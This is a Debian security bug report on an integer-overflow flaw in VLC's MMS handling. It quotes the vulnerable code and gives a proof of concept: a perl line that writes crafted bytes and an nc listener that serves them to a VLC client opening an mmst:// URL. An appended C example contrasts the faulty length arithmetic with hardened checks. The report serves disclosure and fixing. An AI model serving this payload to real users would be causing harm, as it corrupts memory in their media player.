Package: vlc
Version: 0.8.6.i-1
Severity: grave
Tags: security

Hi,
the following security issue was published for vlc:

static int mms_ReceiveCommand( access_t *p_access )
{
    access_sys_t *p_sys = p_access->p_sys;

    for( ;; )
    {
        int i_used;
        int i_status;

        if( NetFillBuffer( p_access ) < 0 )
        {
            msg_Warn( p_access, "cannot fill buffer" );
            return VLC_EGENERIC;
        }

        if( p_sys->i_buffer_tcp > 0 )
        {
[1]         i_status = mms_ParseCommand( p_access, p_sys->buffer_tcp,
                                         p_sys->i_buffer_tcp, &i_used );
[2]         if( i_used < MMS_BUFFER_SIZE )
            {
[3]             memmove( p_sys->buffer_tcp, p_sys->buffer_tcp + i_used,
                         MMS_BUFFER_SIZE - i_used ); //BUG! i_used overflow
(...)

[1] - function that sets i_used to negative value, see below
[2] - i_used is signed, so predicate is true
[3] - actual overflow, we have good control over what is written

static int mms_ParseCommand( access_t *p_access, uint8_t *p_data, int i_data, int *pi_used )
(...)
    i_length = GetDWLE( p_data + 8 ) + 16;
(...)
    if( i_length > p_sys->i_cmd )
    {
        msg_Warn( p_access, "truncated command (missing %d bytes)", i_length - i_data );
        p_sys->i_command = 0;
        return -1;
    }
[1] else if( i_length < p_sys->i_cmd )
    {
        p_sys->i_cmd = i_length;
[2]     *pi_used = i_length;
    }
(...)

[1] - predicate is true
[2] - sets i_used from mms_ReceiveCommand

- Proof of concept - on localhost:

perl -e 'print "aaaa\xce\xfa\x0b\xb0\xef\xff\xef\xff"; print "a"x100' > headshot
nc -l -v -p 1755 < headshot

open this url in VLC: mmst://127.0.0.1/

I can confirm this issue exists. Please see
http://www.orange-bat.com/adv/2008/adv.08.24.txt for the original advisory.
I'll follow up on this bug report with a CVE id soon.

Kind regards
Nico
--
Nico Golde - http://www.ngolde.de - [EMAIL PROTECTED] - GPG: 0x73647CFF
For security reasons, all text in this mail is double-rot13 encrypted.
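The signed-length defect quoted above, as an added C example that is neither VLC's code nor the advisory's: the vulnerable arithmetic beside a parser that keeps the length unsigned and a guarded replacement for the memmove. The value of MMS_BUFFER_SIZE, the get_dwle helper and all function names here are assumptions; the 12-byte prefix is taken from the proof of concept in the report.

```c
#include <stdint.h>
#include <string.h>
#define MMS_BUFFER_SIZE 65536  /* assumed value; VLC's own constant is not on the page */

/* Little-endian DWORD read, standing in for VLC's GetDWLE. */
static uint32_t get_dwle(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}
/* Constructed input: the 12-byte prefix from the proof of concept above,
 * followed by 100 filler bytes (112 bytes in total). */
int build_poc_header(uint8_t *out, size_t cap) {
    static const uint8_t prefix[12] = { 'a','a','a','a', 0xce,0xfa,0x0b,0xb0, 0xef,0xff,0xef,0xff };
    if (cap < 112) return -1;
    memcpy(out, prefix, 12);
    memset(out + 12, 'a', 100);
    return 112;
}
/* Mirrors the vulnerable "i_length = GetDWLE( p_data + 8 ) + 16" stored in an int:
 * the 32-bit sum wraps and the conversion yields a negative length, which then
 * satisfies "i_used < MMS_BUFFER_SIZE" in mms_ReceiveCommand. */
int buggy_length(const uint8_t *p_data) {
    int i_length = get_dwle(p_data + 8) + 16;
    return i_length;
}
/* Hardened: keep the length unsigned, reject wrap-around and any length beyond
 * the data actually received. Returns 0 and sets *pi_used on success. */
int safe_parse_length(const uint8_t *p_data, int i_data, int *pi_used) {
    if (i_data < 12) return -1;                  /* need the full 12-byte prefix */
    uint32_t body = get_dwle(p_data + 8);
    if (body > UINT32_MAX - 16) return -1;       /* "+ 16" would wrap */
    uint32_t i_length = body + 16;
    if (i_length > (uint32_t)i_data) return -1;  /* truncated command */
    *pi_used = (int)i_length;
    return 0;
}
/* Hardened replacement for the memmove: the consumed count must lie in
 * [0, *pi_buffer] before the buffer is compacted. */
int safe_compact(uint8_t *buffer, int *pi_buffer, int i_used) {
    if (i_used < 0 || i_used > *pi_buffer) return -1;
    memmove(buffer, buffer + i_used, (size_t)(*pi_buffer - i_used));
    *pi_buffer -= i_used;
    return 0;
}
/* Both behaviours applied to the proof-of-concept bytes. */
int poc_buggy_length(void) {
    uint8_t b[112]; build_poc_header(b, sizeof b);
    return buggy_length(b);
}
int poc_safe_result(void) {
    uint8_t b[112]; int used = 0; build_poc_header(b, sizeof b);
    return safe_parse_length(b, 112, &used);
}
```

On the proof-of-concept bytes buggy_length yields -1048577, which is why the signed comparison against MMS_BUFFER_SIZE passes; safe_parse_length rejects the same input before any memmove is attempted.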